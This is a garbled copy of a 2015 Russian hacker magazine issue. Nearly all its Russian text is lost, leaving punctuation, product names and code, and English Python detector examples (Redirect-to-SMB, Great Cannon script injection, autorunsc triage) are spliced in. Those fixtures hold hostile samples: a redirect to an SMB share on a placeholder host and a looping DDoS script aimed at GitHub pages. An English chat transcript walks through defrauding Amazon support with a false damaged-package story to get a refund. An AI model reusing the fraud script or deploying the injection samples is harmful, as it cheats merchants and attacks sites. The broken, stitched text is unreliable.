Cover Story
06 (197) : 03.06.2015
. , Windows 95 . - . - . - . - , -. , - .
, ? , : - 46 800 00 . - . 20 (2) . .
, - , -. , . , - .
Stay tuned, stay ][!
, ][@IlyaRusanen
: [email protected]. : 115280, , . -, . 19, . : : 606400, ., -, . , ., . 13. : , 614111, , . , . , . 26. , (-), 77-56756 29.01.2014 . Scanweb, PL 116, Korjalankatu 27, 45101 Kouvola, . 96 500 . 630 . . . , - , . . - : [email protected]. , , 2015
PC ZONE [email protected]
ant
UNITS
UNIXOID SYN/[email protected]
Dr.
MALWARE, , PHREAKING
X-MOBILEexecbit.ru
-
DVD
ant
shop.glc.ru, [email protected]
([email protected]) : , 109147, / 50
PR-
16+
2015
197
004 MEGANEWS
010
014
016
020 Amazon
022 Frontend -
024
028 FileMaker Pro 14 iOS
032 Parallels Access 2.5
034 AmigaOS
040 , Android- franco.kernel
044 SQLite root
050
051 #8. APK
052 Easy Hack
056
061 Tor:
066 RSA Conference 2015 IT-
072 ,
074 MITM-
078 WPAD WPAD
082 X-Tools C
084 ][-: Internet Security McAfee Total Protection, Microsoft Security Essentials
090 WIM, CSRSS, EMET, CCMP, EFS, SEHOP, ASLR, KPP, UAC, DEP -1
094 Carbanak Equation 11
096 Android
102 API
106 CUSTIS DZ Systems
110
116 : Debian 8
122 IDS/IPS Suricata
126 MS SQL Server
130 Bro
136 Razer
140 FAQ
144 WWW -
Microsoft - Windows 10 , - . - .
- ,
Project Spartan. - Edge, - -, . , Spartan , , Microsoft -. , , - E. Internet Explorer, . Microsoft , IE - . IE Windows 10 , - . - . , . , Microsoft , Edge Google Chrome Mozilla Firefox. ,
, , -. Microsoft Bounty Programs. - 500 15 .
- -. , , Windows 10 Android iOS, . Microsoft , -, , - , Windows. SDK. Android- Java C++, iOS- - Objective-C.
-. Microsoft Open Technologies, -, Microsoft Open Source, Linux Windows. Microsoft , - , . , - .
Meganews
Mifrill [email protected]
Internet Explorer
Edge .
windows 10 Microsoft
Microsoft -
Windows 10
.
,
-
Windows 10
- . -
200
Windows 8.
oogle , YouTube. , , . YouTube . . -
? , . - , . Google -: . , Google . , , .
, Google YouTube API v2, 2008 . , YouTube API v3. -, API- v2, . Google , - API v2 , 2012 , Google TV, iOS, Blu-ray- Sony Panasonic. -, - XML. , .
YouTube, Google
g
Cylance - , - - Windows,
. Microsoft, -. Adobe Reader, Apple QuickTime, Apple Software Update, Internet Explorer, Windows Media Player, Microsoft Excel, Symantec Norton Security Scan, AVG Free, BitDefender Free, Comodo Antivirus .
, , - Redirect to SMB, - 1997 ! Server Message Block. , SMB- , / . Windows API (URLDownloadToFile, URLDownloadToCacheFile, URLOpenStream, URLOpenBlockingStream) HTTP/HTTPS SMB, URL file://1.1.1.1. Microsoft , - TCP 139 TCP 445.
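The bug class behind Redirect to SMB is a client that follows an HTTP redirect into a file:// URL and thereby opens an SMB session to whatever host the attacker names, answering its authentication challenge on the way. The check below is an added example for this item (not code from the original article or from Cylance's advisory): it resolves a Location header the way a browser would and refuses any hop that leaves http(s). The hostnames and the redirect chain are constructed; 1.1.1.1 is the placeholder address the advisory itself used.

```python
"""Redirect-to-SMB guard: refuse redirects that leave http(s).

Added example for this article, not code from the original or from
Cylance. The Windows URL APIs named above followed a 30x Location header
to file://HOST/share, which made the client open an SMB session to HOST
and answer its authentication challenge. The URLs below are constructed.
"""
from urllib.parse import urljoin, urlsplit

SAFE_SCHEMES = {"http", "https"}
REDIRECT_CODES = {301, 302, 303, 307, 308}


def check_redirect(current_url: str, location: str) -> tuple:
    """Return (allowed, resolved_target, reason) for one Location header."""
    raw = location.strip()
    if raw.startswith("\\\\"):
        # A UNC path is an SMB access even without a scheme.
        return (False, raw, "UNC path")
    # Relative targets are joined against the current URL; an absolute
    # target with a foreign scheme (file://...) is kept as-is by urljoin,
    # which is exactly what we then refuse.
    target = urljoin(current_url, raw)
    scheme = urlsplit(target).scheme.lower()
    if scheme not in SAFE_SCHEMES:
        return (False, target, f"scheme downgrade to {scheme or 'none'}")
    return (True, target, "ok")


def follow(start_url: str, responses: dict, max_hops: int = 5) -> tuple:
    """Walk a redirect chain described as {url: (status, location)}.

    Returns (last_url, None) when the chain ends at a fetchable http(s)
    URL, or (offending_target, reason) when a hop is refused.
    """
    url = start_url
    for _ in range(max_hops):
        status, location = responses.get(url, (200, None))
        if status not in REDIRECT_CODES or not location:
            return (url, None)
        allowed, nxt, reason = check_redirect(url, location)
        if not allowed:
            return (nxt, reason)
        url = nxt
    return (url, "too many redirects")


# Constructed chain: an update URL bounces once over HTTPS and then to an
# SMB share. 1.1.1.1 is the placeholder address the advisory itself used.
CONSTRUCTED_RESPONSES = {
    "http://updates.example.test/app/update.exe": (302, "https://cdn.example.test/update.exe"),
    "https://cdn.example.test/update.exe": (302, "file://1.1.1.1/share/update.exe"),
}
```

Refusing the scheme change inside the client is the application-side fix; the network-side one the item mentions is the usual perimeter rule, no outbound TCP 139/445.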
Windows, 18
C
, . , , , , . .
API v2
, , ,
Google .
06 /197/ 2015 5
, . - , -
. - (, ) -. , .
Computer-Human Interaction Yahoo Labs Bodyprint. Bodyprint , - . , , , -. , Yahoo , , . , . - , - , , .
Yahoo
Bodyprint
.
-
,
: -
,
99,52%.
- . WikiLeaks 173 132 2000 30 287 Sony Pictures Entertainment. . Sony. - , .
RSA Conference - . POS-, - 1990 , . . : 166816 ( Z66816, ). , - , , , , - Verifone.
166816
173 132 -, - , . ,
, - . - , - - , .
LIVE Plus
GitHub . , -
(Great Canon), - .
- Citizen Lab, , - GitHub, Greatfire.org, DDoS GitHub. Citizen Lab, , man-on-the-side - . . , GitHub Baidu.
GitHub Google, Safe Browsing. , -, , . 1 15 2015 , Baidu 3 2015 , 7 . -
- ,
TLS, , Google - GitHub.
. -, 3 6 , IP- 114.113.156.119:56789 -. 14 , d3rkfw22xppori.cloudfront.net. HTTP, HTTPS. 18 *.cloudfront.net , . 25 Cloudfront . GitHub. github.com/greatfire/wiki/wiki/nyt/, github.com/greatfire/ github.com/greatfire/wiki/wiki/dw/.
JS. 995 1325 . : cbjs.baidu.com (123.125.65.120), eclick.baidu.com (123.125.115.164), hm.baidu.com (61.135.185.140), pos.baidu.com (115.239.210.141), cpro.baidu.com (115.239.211.17), bdimg.share.baidu.com (211.90.25.48), pan.baidu.com (180.149.132.99), wapbaike.baidu.com (123.125.114.15).
, Google - , : TLS, .
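The replaced scripts were served in the clear from the Baidu hosts listed above, and the injected code did nothing but request github.com/greatfire pages in a loop from every visitor's browser. The detector below is an added example (not part of the original item or of Citizen Lab's report): given captured script bodies, it flags a monitored host's plain-HTTP script that references the known targets, and treats a TLS-delivered script as out of scope, since an in-path injector cannot rewrite it. The host list and targets come from the article; the captured bodies are constructed.

```python
"""Heuristic for Great Cannon-style script replacement on the Baidu hosts above.

Added example, not from the original item or Citizen Lab's report. The
host list and the github.com/greatfire targets are the ones the report
named; the captured script bodies are constructed. A script fetched over
TLS is out of scope here because an in-path injector cannot rewrite it.
"""
import re

INJECTED_HOSTS = {
    "cbjs.baidu.com", "eclick.baidu.com", "hm.baidu.com", "pos.baidu.com",
    "cpro.baidu.com", "bdimg.share.baidu.com", "pan.baidu.com", "wapbaike.baidu.com",
}
KNOWN_TARGETS = ("github.com/greatfire",)
URL_RE = re.compile(r"https?://([^/\s'\"<>]+)(/[^\s'\"<>)]*)?", re.IGNORECASE)


def external_refs(body: str) -> list:
    """host+path of every absolute URL in a script that is not under baidu.com."""
    refs = []
    for m in URL_RE.finditer(body):
        host = m.group(1).lower()
        if host != "baidu.com" and not host.endswith(".baidu.com"):
            refs.append(host + (m.group(2) or ""))
    return refs


def classify(host: str, scheme: str, body: str) -> str:
    """'great-cannon' when a monitored host's plain-HTTP script hits a known target."""
    if host.lower() not in INJECTED_HOSTS:
        return "unmonitored"
    if scheme.lower() == "https":
        return "tls-delivered"
    refs = external_refs(body)
    if any(r.startswith(KNOWN_TARGETS) for r in refs):
        return "great-cannon"
    if refs:
        return "suspicious"      # analytics/ad code with a foreign target: look at it
    return "clean"


def scan(captures) -> list:
    """captures: iterable of (host, scheme, script_body) -> [(host, verdict), ...]."""
    return [(host, classify(host, scheme, body)) for host, scheme, body in captures]


# Constructed captures: a normal tracker stub, a replaced one that hammers
# a GitHub page in a loop, a TLS-delivered script, and an unrelated host.
CONSTRUCTED_CAPTURES = [
    ("hm.baidu.com", "http",
     "var _hmt=_hmt||[];(function(){var s=document.createElement('script');"
     "s.src='//hm.baidu.com/hm.js?1';document.head.appendChild(s);})();"),
    ("hm.baidu.com", "http",
     "setInterval(function(){new Image().src='https://github.com/greatfire/wiki/wiki/nyt/?'"
     "+Math.random();},2000);"),
    ("pos.baidu.com", "https", "document.write('<div id=\"ad\"></div>');"),
    ("example.test", "http", "fetch('https://github.com/greatfire/');"),
]
```

The "suspicious" verdict is deliberately broad: an analytics script that talks to anything outside its own domain deserves a look even when the target is not one of the known ones.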
GitHub
Loggy GitHub, -, -. , ( 70% ) - 2012 - 2014 .
Citizen
Lab ,
-
-
,
.
, , , - , , . , , ,
, . 2013 ,
Minecraft DoS-. - , . - Mojang . , . , 1.6.2. 1.8.3, - - . (blog.ammaraskar.com/minecraft-vulnerability-advisory).
0x08: Block Placement Packet 0x10: Creative Inventory Action. , , - , 30 . - Java-, ArrayLists, . , , CPU - .
, -, Mojang .
,
? Trend Micro Ponemon Institute ,
, -. 1903 18 .
, Google - Google Play, , , -
. - Google Play adware, Android -. : ( - , - ), - , . Adware.MobiDash.2.origin - Adware.MobiDash.1.origin. , -, , .
, , , , - Google Play, . Android.Toorch.1.origin. -. , , - . , root- , - .
Android
Google Play - , 100%
Minecraft
, - Nero,
. WebMoney -
-... .
WebRTC, Chrome, Firefox Opera. , -
: ?
- . Google eBay, AliExpress
, - .
, ( )
.
, - , Stack Overflow.
,
, : ru.stackoverflow.com. , ,
, , . - - 30 .
,
. - - MP3- -. ,
, - .
, MP3 - :).
, Joomla WordPress, - ( WordPress, W3Tech, 23,9% ). . CMS
. , -, - CMS .
WordPress : . , , - . WordPress 4.2 , , Klikki Oy. , , - (64 ), , - HTML-. , , . - :
WordPress Foundation , , - CMS.
, , , . WP-Super-Cache, HTML - . (XSS). , -. , Sucuri : 8 10 . , .
. , , , WordPress, - RevSlider, Gravity Forms, FancyBox, WP Symposium MailPoet. WordPress Foundation - .
WordPress CMS
, WordPress 4.2,
. ,
.
-,:-.,-.--.
,.
-. , 1906 - . . .,-.
, --,-..-. ,-.
. --,- . -.-.
PwnieExpress.-,,,. X: -,-.- . DEFCON.
,,- ( !), . -.-.
- -.!. USB-.,,,.
.,,.,?
, -.,,, -.. . , , , ., . , .
, -,-.,.-,-.
-,.,,.
. ,.,, . , -,- . ,-.
, , ..!-,,,- , , ,. . - .
,-.,,.?. -email,- , -.
-- . , ,- . ,,-.
INFO
- .
, .
.
-
.
.,- Social-EngineerInc., . , -.-, , - . , ,,-.,,.
! -. , ,-, . .LinkedIn., ,.-.Twitter.Foursquare- -..
GlobalDigitalForensics-., Facebook ,.- , :!!-,,-,.
Keep it simple!,-, .Solutionary,,,-.
-,.,.--:-. XX.
, . ,,-,,-.
-. . -, -.,.-,.,-. ,.
-, --GeneralDynamicsFidelisCybersecuritySolutions.-.
- (SSLVPN)- . email :-- . , .,-..
.60%-.-,-75%.().
- , ,ComputerSciences Corporation. , -,-. , ,.
-.,DHS.-,.
60%-.- 90% .
WWW
IDG
:www.csoonline.com
:
is.gd/OtQtwX
--.,-,--
,,-.
- . ,-ILOVEYOU2000.- - .BlueCoat,-BainCapital.
BlueCoat,., .,-.
,.- Girlsof the IsraelDefenceForces. ,.
-.ReverseSE. , - , ., . -, , .
. -.,-,.-,-.,-. -, .,-.
?, - . , - . The SecurityAwareness 25 . . --.-,..-
:-,, , .
!-.-,,.- 1200 ,-.
, - -,-(!)., . - , . -.
,-- - , ,.:,- . , , -.-,. -, .,XXI-.
, .-- . ,.,-.,-.,.,.(!)-.
: ,- , . .
,,-.,-,,.
, - , . , - , ,.,,,- , ..
WARNING
-
. , -
, -
.
1200-
,
-.
,-.,,.-
,..
, -,?,-,.
,. , -LinkedIn.-:,()-.:(),-,-.,,,-.,(,)-..
, .,,-.
,- . ,,-(-,)..
, , , , , .Facebook,Google+,Tumblr(,,,),GoogleImages(),Twitter(),Pinterest,FlickrInstagram(-,),Ask.fm(),Meetup(- ) . , .
, Foursquare, iCloud (, iCloud ). - .: spokeo.com ;city-data.com ;whitepages.com,,,.
.--.Maltego,.-.
Maltego CaseFile. .CaseFile
, CSV,XLSXLSX.
Ghostery.-,Maltego . Ghostery ,.
- , . ,, , .,,,,- . , , , . , , -, . ,.
. Whois (IP, -). BuiltWith.-,-,SSL,,-JavaScript-.,,.
,--,,- -.
. --Google , (-).
, - Rivalfox, - : Facebook,Google+, Twitter, Instagram - ( -).FalconSocial, .
-, -,!
Maltego
Ghostery
- SQL-. , Advanced Persistent Threat (APT) - , .
- , -
.
Positive Technologies
, - , - . -
: , , .
/READY , , - . ?
. .
? , , - .
-? , .
? -? : , . - - !
? ? ? , - - , ?
? , , -, . - , .
: , , , .
. , - , .
, , , , , , , . .
. , . standalone Metasploit. - , - FOCA MALTEGO. , SMTP- - VRFY/EXPN .
, -. . - ; . - , - !
, , - , - . . -
, ( - ) , . - - , .
/STEADY . .
. -: , - .
, , , -. - : -
; , -
. , ;
, -. , Bad USB, Teensy .
: , -
, : , ;
SMS MMS, - , .
.
-
- . , . -, . , , SSRF
callback Reverse DNS. . : 100, 90, . , , , , .
, (- ).
. , !
SMTP relay ( ) - .
, XSS/RCE . . -, .
. - . , , , , , .
: -, , , - . APT .
, , - : - - .
, - , - , -. . - : - , , .
, - . . , -: , , , , .
, , - . . , , - , - .
, -. -: , : l i, o 0 . - , , . , - , - . , - , .
: SMTP- relay. SMTP. - 25/465 sendmail . , , - - : Reflected File Download, Open Redirect, XSS RCE SQLi , HTML . - . - , - .
: , - . . -! ( HTTP, DNS, ), , ( ), , -, . -
. , .
/GO : , - . , ( , ). , - .
: , . - , .
, , , - , . - , ( - ). , - , . - , -. , , , - .
ptsecurity.ru.
Positive technologies
WWW
-
(blog.didierstevens.com).
. - - Threatpost. com.
- ,
, -. , .
/ FINISH HIM! - - VPN, RDP, . , .
Positive Technologies - , - . 2014 , , , -, - , 15%. . , ( ).
15% ? . .
? , - , . - .
: , , - . , - .
- ( - , - ). , - . - : , , , . , - . , - : SMS .
, - . -, .
84ckf1r3 [email protected]
- . - , - , . - , , .
IQ , , - . , - , , , . DDoS- .
- . - , - .
- , , : - , - . , , , .
, - , - . , , - . -, .
-. - , . - .
- -
- . - -, , , (, , - , ), ( - , , -, , - ). - . - , - .
- : ( - ) , - - , , . - .
-
-
-
. -
- Amazon , - , ,
.
Amazon
Kaimikaimi.ru
- , - , BlackBank Market. -
, , , , Amazon.
. , , Ships from and sold by Amazon.com Fulfilled by Amazon ( - ), 1500 ( - ), - . : , email Amazon, , , , , .
, -, Deep Web, - , , , .
, ! , --. - - , - . , -, , .
? - , - Amazon. , , . Amazon, VCC (virtual credit card) --, . - Amazon. , . . - .
You are now connected to Amazon from Amazon.com.
Me: Hello, several days ago I've ordered a gift for my friend for his birthday. I've received it, but the order package seems to be damaged.
Amazon: Hello Bob, thanks for contacting Amazon, my name is Alice. I am so sorry to hear about this. Please allow me a moment to check on this for you, I'll be happy to assist you. May I have the order number you are referring to please?
Me: Order number is ###-######-#######
Amazon: I'll be happy to help you with this, but first we would need to go through a quick security verification in order to access your account. May I have the email address, the name and the full billing address on your account please?
Me: E-mail: #####@hotmail.com; Name: Bob Smith; Address: Sample Street 1150 15, NW Washington DC 20071.
Amazon: Would you mind if I take a moment to check on this for you? It will take a few minutes.
, , , - ( , Amazon).
Amazon: Our best option in this case would be to issue a refund associated with a return, or a replacement associated with a return. Also I can upgrade to the fastest shipping available.
, , - , . .
Me: Sorry, but I can't return the package. It turned out that it was damaged and inside the box everything is covered with something like black tar, so I threw it away, because it doesn't seem to be normal and can be dangerous.
Amazon: You can put the whole package in any bigger box and send it back for a full refund.
- .
Me: I understand, but I'm saying that I've thrown away the package, because this tar can be dangerous for health. And as I've mentioned before, it was a birthday present for my best friend. I can't wait for a replacement and such stuff, I'd rather try now to buy something at a local store to catch the beginning of the birthday celebration.
Amazon: OK. I will issue the item refund for you. One moment please.
Me: Thank you for understanding.
Amazon: Sorry for waiting, I've requested the refund, you'll see the refund back to your original payment method within 2-3 business days. I'll also make sure to send you a confirmation regarding today's solution.
Me: Thank you!
Amazon: You are very welcome! Is there anything else I could help you with today?
! . , - , , .
, , - , .
, - , . , Amazon - - .
, : ( - ) , , - ( -, ).
? , , , , , , . Amazon , - . , , , , , , .
,
-
-
Amazon
Frontend -
ipestov.com
ExpandJS
www.expandjs.com , -, . - . , -, HTML-, .
ExpandJS. -, 80 - 350 JavaScript- . Material Design, .
Form factor: {{type}}
Mobile device: {{mobile ? 'yes' : 'no'}}
Ramjet
https://github.com/rich-harris/ramjet , - - . SVG, DOM- - . Ramjet - easing- -:
// a and b are the two DOM (or SVG) elements to morph between;
// to repeat, run this from the console!
ramjet.transform(a, b);
, - , . GitHub , - -. , .
Electron
electron.atom.io NativeScript React Native - -. Electron, - HTML, CSS JavaScript. Electron, Atom Shell, GitHub. , , , - . io.js Chromium. , - Atom, - , Docker, Slack, Facebook, Microsoft. , : Electron Windows-.
jQuery.my
https://github.com/ermouth/jQuery.myjQuery.my - . - , , . jQuery.my Query UI, Select2, CodeMirror, Ace, Redactor, CLeditor, jQuery Mobile .
var data = { name: "Luke Skywalker", age: 46 };
$("#form").my({ ui: { "#name": "name", "#age": "age" } }, data);
PlayCanvas
https://playcanvas.com/ . -, Playcanvas JavaScript c WebGL 3D , -, Maya, 3ds Max, Blender. -, . - -, - GitHub.
// Create a PlayCanvas application
var canvas = document.getElementById("application-canvas");
var app = new pc.Application(canvas, {});
app.start();
// Fill the available space at full resolution
app.setCanvasFillMode(pc.FILLMODE_FILL_WINDOW);
app.setCanvasResolution(pc.RESOLUTION_AUTO);
// Create box entity
var cube = new pc.Entity();
cube.addComponent("model", { type: "box" });
// Create camera entity
var camera = new pc.Entity();
camera.addComponent("camera", { clearColor: new pc.Color(0.1, 0.1, 0.1) });
// Create directional light entity
var light = new pc.Entity();
light.addComponent("light");
// Add to hierarchy
app.root.addChild(cube);
app.root.addChild(camera);
app.root.addChild(light);
// Set up initial positions and orientations
camera.setPosition(0, 0, 3);
light.setEulerAngles(45, 0, 0);
// Register an update event
app.on("update", function (deltaTime) {
  cube.rotate(10 * deltaTime, 20 * deltaTime, 30 * deltaTime);
});
Clusterize.js
https://github.com/NeXTs/Clusterize.js . - 500 - . Clusterize . - , - -, . : WebKit/Blink 134 217 726 px; Gecko 10 737 418 px; Trident 17 895 697 px.
// JavaScript
var data = ['', '']; // one HTML string per row
var clusterize = new Clusterize({
  rows: data,
  scrollId: 'scrollArea',
  contentId: 'contentArea'
});
Globalize
https://github.com/jquery/globalize , - Node.js . Globalize , . Unicode CLDR JSON, i18n.
Vault
https://github.com/hashicorp/vault , - Go. Vault , , , API . API : HSMs, AWS IAM, SQL . - , , - , , Vault.
Egg.js
thatmikeflynn.com/egg.js , , - . UX- . , Egg.js , - .
var egg = new Egg();
egg
  .addCode("up,up,down,down,left,right,left,right,b,a", function() {
    jQuery('#egggif').fadeIn(500, function() {
      window.setTimeout(function() { jQuery('#egggif').hide(); }, 5000);
    });
  }, "konami-code")   // metadata for this egg, exposed to hooks as this.activeEgg.metadata
  .addHook(function() {
    console.log("Hook called for: " + this.activeEgg.keys);
    console.log(this.activeEgg.metadata);
  })
  .listen();
JSON Server
https://github.com/typicode/json-server -, - JSON. - REST API .
db.json:
{
  "posts": [
    { "id": 1, "title": "json-server", "author": "typicode" }
  ],
  "comments": [
    { "id": 1, "body": "some comment", "postId": 1 }
  ]
}
Start the JSON server:
$ json-server --watch db.json
A request to localhost:3000/posts/1 returns:
{ "id": 1, "title": "json-server", "author": "typicode" }
. . ,
-.
Photo: bonumopus@shutterstock.com
WARNING
- - . ,
.
WWW
Sysinternals, 73: is.gd/DuTDyN
NirSoft, 56: is.gd/GmkDwW
AVZ: z-oleg.com
Autoruns Winternals Software ( - Sysinternals.com), Microsoft. - - , - Microsoft. - 13.3 2015 . v.13.0 , , -, .
Autoruns . - -, ( ) . - Windows, , - , .
, - Microsoft, , . - , .
- . Autoruns , .
. - , . (is.gd/0TQ6Ye), :
autorunsc -a blt -vrs -vt > C:\Autor.log
autorunsc , . -a , . : b boot execute ( , -), l logon, - t . blt (*), .
-vrs -vt VirusTotal.
, Microsoft . , - . , - VirusTotal - .
Autorunsc ( ), -. -. UCS-2 Little Endian. - :
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
   Adobe ARM
     "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
     Adobe Reader and Acrobat Manager
     Adobe Systems Incorporated
     1.801.10.4720
     c:\program files (x86)\common files\adobe\arm\1.0\adobearm.exe
     20.11.2014 21:03
     VT detection: 1/56
     VT permalink: (link to the VirusTotal report)
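On a machine with a few hundred autostart entries nobody reads the report top to bottom; the useful view is "which entries did VirusTotal flag, worst first". The parser below is an added example (not part of the original article or of Sysinternals): it decodes the UCS-2 LE file and walks the default report layout, an unindented autostart location, an indented entry name, then more-indented detail lines in the order the sample above shows. That layout is an assumption of this parser; check it against your version's output before trusting it. The report it parses is constructed.

```python
"""Triage autorunsc output: pull out the entries VirusTotal flagged.

Added example, not part of the original article or of Sysinternals.
autorunsc writes UCS-2 LE text; in its default report each autostart
location is an unindented line, each entry under it an indented name
followed by more-indented detail lines in the order the sample above
shows (launch string, description, publisher, version, image path,
timestamp, then 'VT detection: n/m' and 'VT permalink: ...'). That
layout is the assumption this parser makes; the report below is
constructed.
"""
import re

VT_RE = re.compile(r"VT detection:\s*(\d+)\s*/\s*(\d+)")
DETAIL_FIELDS = ("launch", "description", "publisher", "version", "image_path", "timestamp")


def parse_autorunsc(raw: bytes) -> list:
    """Return one dict per autostart entry."""
    text = raw.decode("utf-16-le").lstrip("\ufeff")
    entries, location, current, entry_indent = [], None, None, 0

    def flush():
        nonlocal current
        if current is not None:
            entries.append(current)
        current = None

    for line in text.splitlines():
        if not line.strip():
            flush()
            continue
        indent = len(line) - len(line.lstrip())
        value = line.strip()
        if indent == 0:                                   # autostart location header
            flush()
            location = value
            continue
        if current is None or indent <= entry_indent:     # entry name line
            flush()
            entry_indent = indent
            current = {"location": location, "entry": value, "vt_hits": None, "vt_total": None}
            continue
        m = VT_RE.match(value)
        if m:
            current["vt_hits"], current["vt_total"] = int(m.group(1)), int(m.group(2))
        elif value.startswith("VT detection:"):           # e.g. 'Unknown': hash not on VirusTotal
            current["vt_status"] = value.split(":", 1)[1].strip()
        elif value.startswith("VT permalink:"):
            current["vt_permalink"] = value.split(":", 1)[1].strip()
        else:
            for name in DETAIL_FIELDS:                    # positional details, in report order
                if name not in current:
                    current[name] = value
                    break
    flush()
    return entries


def flagged(entries: list, min_hits: int = 1) -> list:
    """Entries with at least min_hits VirusTotal detections, worst first."""
    hits = [e for e in entries if e["vt_hits"] is not None and e["vt_hits"] >= min_hits]
    return sorted(hits, key=lambda e: e["vt_hits"], reverse=True)


# Constructed report in the layout described above (BOM + UCS-2 LE like the real file).
_SAMPLE = "\n".join([
    r"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run",
    r"   Adobe ARM",
    r'     "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"',
    r"     Adobe Reader and Acrobat Manager",
    r"     Adobe Systems Incorporated",
    r"     1.801.10.4720",
    r"     c:\program files (x86)\common files\adobe\arm\1.0\adobearm.exe",
    r"     20.11.2014 21:03",
    r"     VT detection: 1/56",
    r"     VT permalink: (report link)",
    r"   Updater",
    r'     "C:\Users\Public\Libraries\updater.exe" /silent',
    r"     System Updater",
    r"     n/a",
    r"     1.0.0.0",
    r"     c:\users\public\libraries\updater.exe",
    r"     02.06.2015 09:12",
    r"     VT detection: 34/57",
    r"     VT permalink: (report link)",
    "",
    r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"   OneDrive",
    r'     "C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    r"     Microsoft OneDrive",
    r"     Microsoft Corporation",
    r"     17.3.5892.0626",
    r"     c:\users\bob\appdata\local\microsoft\onedrive\onedrive.exe",
    r"     14.05.2015 18:40",
    r"     VT detection: 0/57",
    r"     VT permalink: (report link)",
])
SAMPLE_REPORT = ("\ufeff" + _SAMPLE).encode("utf-16-le")
```

A single detection out of 56 engines, as in the Adobe ARM line, is usually a false positive from one vendor; the entry worth opening first is the one with a couple of dozen hits and a launch path under a user-writable directory.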
Autoruns : is.gd/0TQ6Ye.
Autoruns
, VT
- , . - - .
Process Explorer Autoruns Process Explorer (PE). PE, Autoruns, - .
PE : - . , - ( ) VirusTotal. , . , -, .
, . - , , , - /, . - . , . , () . .
PE . - . , - VirusTotal, , (suspend) -. - ( ), -. , Process Explorer (resume). -, , -. BIOS/UEFI, .
- , -. - , - . Process Explorer . , , . PE .
Process Explorer, - ( ) Debugging Tools for Windows. (is.gd/flp0WS) Windows Driver Kit (is.gd/TURLrM). Process Explorer Microsoft (is.gd/VR6CwF).
, Torrent Process Explorer
- Safari
Unlocker , Windows, . . , -, (Cedrick Collomb). Unlocker : - , . 2013 , - . , - , index.dat, Windows .
Unlocker , - . .
. , .
. AVZ ( ) .
. Unlocker, AVZ Boot Cleaner. , Windows . , , .
AVZ -. NTFS , - Microsoft . , - HackTool. - , - . AVZ - .
AVZ -, .
- , . .
AVZ AVZ, , . , - -. , , - , , SPI Winsock , .
- . AVZ , , , - . AVZ - .
AVZ , - , AVZPM . - , , - .
AVZGuard , AVZ. ,
AVZ
Unlocker ,
, -.
, . Unlocker , - . - Win32 API, : -, .
, . Unlocker .
1.9.0 64- Windows. - . Unlocker Assistant. - Unlocker , - . -h
AVZ
FileMaker Pro 14 iOS
Photo: Frannyanne@shutterstock.com
Microsoft Access . . ,
, , . , , - . -, Access FileMaker Pro 14.
Access, FileMaker Pro - , ( , . , , FileMaker Server). FileMaker Pro , .
, , - (, , Windows 8 OS X 10.10) . , - .
FileMaker , Access, -. . - MS-DOS, . Apple , FileMaker . , Microsoft - . Access - .
FileMaker . - , - Mac OS. FileMaker Pro - , OS X ( Windows, , ). , - , : , - . FileMaker Pro , .
Access -, , - , FileMaker Pro -
. - , . FileMaker Pro -, .
- iOS. FileMaker Pro , iPhone iPad. , , , - . , , FileMaker Pro - .
FileMaker Pro 14. - (Layout) , , -. FileMaker Pro Access. , . - , -. ,
Filemaker Pro 14
.
Windows
FileMaker Pro 14
data-driven . Microsoft Access, - . FileMaker , -. iOS.
, , PDF.
, (Browse), - . - FileMaker Pro , , .
. (Find) -, , , - .
, , . - Manage, . Manage Database, - : Tables, Fields Relationships. , , , . , , , .
CRM - . , . , - : , .
, : Calculation Summary. , , -, . Options - , , , .
Relationships , (foreign keys), , - FileMaker Pro, (match fields). - : - , - , . - , .
Manage Database, , FileMaker Pro -: . , : . -, . .
- . , , .
. FileMaker Pro - , . ( , ) . iPad, Enlightened Touch. - , .
. , , - , , . , , , - , . - .
- . ( ) ( , ). - : , - , - .
, . : - . .
-
.
-
,
.
,
-
. -
-
.
FileMaker Pro 14
, -.
. , . - , . . - , - . - , . .
. ( , - , ) - iPad. (File / Share with FileMaker Pro Clients), -.
, - iOS, - , , , , .
- - c . , - .
, - , - . . - : , -.
-, . FileMaker Pro , , , . - , , , - , . ?
-. , ( - ). : , -. , FileMaker Pro , : - = ::. !
. : - FileMaker Pro. - , - , . .
, -
-
iPad
- -, Parallels Access . - , - . - .
Parallels Access 2.5
, Parallels Access, , -. OS X VNC, - ,
- . , ?
Parallels -, . - , ( Windows). - - .
, Parallels Access ( iOS, Android). ,
, . . , , - , , - -, ( , - , , ).
, -. : , , -, Launchpad. , , . : . Access , .
.
,
? : -, , Photoshop, - . - . - . Photoshop , .
Parallels Access - . 443- (HTTPS), . - Parallels , , IP- - . Parallels Access access.parallels.com, - .
, Parallels Access . - 650 . , , - , .
, Parallels Access . - , - , . , .
, - Parallels Access . - - , . Parallels Access , - . , . , , , , - . , , , - .
- , . : , Launchpad, , . Parallels Access.
. , Parallels Access - , , . - iOS Android: .
, - . - , . -, , Windows Finder - . : . , . Parallels Access - .
, - Parallels Access -. . - ! , Parallels Access . . , World of Warcraft, : , - , -. , . , -, VNC.
, Parallels Access . , -
, !
,
Photoshop -
!
,
-
-
, -
Amiga Corporation. - . -: , . , -
- .
Amiga Corporation . (Jay Miner), Atari. - 8- , Atari 2600 Atari 400/800. Atari , - , , - , .
- . - , Motorola 68000, Atari --, , , .
(David Shannon Morse) - Tonka Toys, . - Lorraine ( ) - .
- 32- Motorola 68000. , , - - - . Motorola 68k Apollo Apple Macintosh . , - - . Lorraine , Apple Macintosh, ( ).
Lorraine - . , --
1985 Commodore Amiga AmigaOS. - -, -. , .
AmigaOS
, - - , . (DMA), - , -. ? , - ( 640 256 4096 ) ( - ) Dual Playfield ( - -), c . - 8- - 14- .
Lorraine 1983 - . - CES - . - Boing Ball , Amiga, AmigaOS.
Lorraine - , OCS Original Chip Set. : Agnus DMA, - ( 2D-), Denise , - , Paula . - , - Lorraine. , , Atari, - Lorraine 16- Atari ST, Commodore, -. Commodore - Commodore Amiga 1000 - Motorola 68000 OCS.
AmigaOS. OCS - Amiga 1000 , , , , Commodore - . NTSC PAL - .
. - AmigaOS, Amiga 1000,
Agnus, Denise Paula. , , . software engineers (R. J. Mical), (Dale Luck) (Carl Sassenrath).
